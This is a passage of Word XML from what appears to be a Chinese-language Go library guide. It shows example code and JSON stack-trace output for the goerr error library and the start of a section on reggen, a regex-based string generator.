    <w:p w14:paraId="047D5CC6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">        /usr/local/go/src/runtime/asm_arm64.s:1259</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585CCA0E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>exit status 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC068C7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42809780" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>跟踪堆栈错误</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A40D10E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A0F1D6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"github.com/m-mizutani/goerr"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506A59DC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B0632D4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"github.com/rs/zerolog/log"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D8A3B0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0C8B61" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="554BC60E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func someAction(input string) error {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F9DB4E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if input != "OK" {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5F1F78" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>goerr.New("input is not OK").With("input", input)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E471A28" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C34905" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>return nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D53284" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFFA26F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="590743CE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C11A9E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>if err := someAction("ng"); err != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3926DEA3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>// Same with errors.As extraction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2337F8BF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">if goErr := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>goerr.Unwrap(err);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> goErr != nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354E6F95" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">stacks := </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>goErr.Stacks()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1B89D0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>log.Info().Interface("stackTrace", stacks).Msg("Show stacktrace")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4482AC81" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6420B6B0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560D785F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCFA6B5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="023B5190" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以下为输出：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B4B2B1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0737FEAF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">  "level": "info",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A32238B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">  "stackTrace": [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408A462A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B29BB7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">      "func": "main.someAction",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460C88E2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">      "file": "/Users/mizutani/.ghq/github.com/m-mizutani/goerr/examples/stacktrace/main.go",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EC11ED" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">      "line": 11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2078AA69" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502E348B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A28D65" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">      "func": "main.main",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52170773" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">      "file": "/Users/mizutani/.ghq/github.com/m-mizutani/goerr/examples/stacktrace/main.go",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5885A39D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">      "line": 17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E299E6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2536DA8F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446B56CC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">      "func": "runtime.main",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EDA873" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">      "file": "/usr/local/go/src/runtime/proc.go",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C64238A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">      "line": 250</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B41DDA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EA214B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210BFFB5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">      "func": "runtime.goexit",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645D84D7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">      "file": "/usr/local/go/src/runtime/asm_arm64.s",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BE0DE2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">      "line": 1259</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002798E2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A20BA4C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">  ],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24979ED3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">  "time": "2022-05-14T10:50:42+09:00",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B4C2C2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">  "message": "Show stacktrace"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA06D53" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518EC70B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D76CC2E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="375" w:name="_Toc159779826"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>github.com/lucasjones/reggen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：反向生成正则表达式</w:t>
      </w:r>
      <w:bookmarkEnd w:id="375"/>
    </w:p>
    <w:p w14:paraId="01840317" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40773EEE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个是用来根据正则表达式，生成符合正则表达式的字符串的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B6056E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反正则表达式来生成字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FB3184" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>package main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA765A7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59F38332" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFCF299" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>"fmt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF3C4D4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71D2CC8F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>"github.com/lucasjones/reggen"</w:t>
      </w:r>
    </w:p>
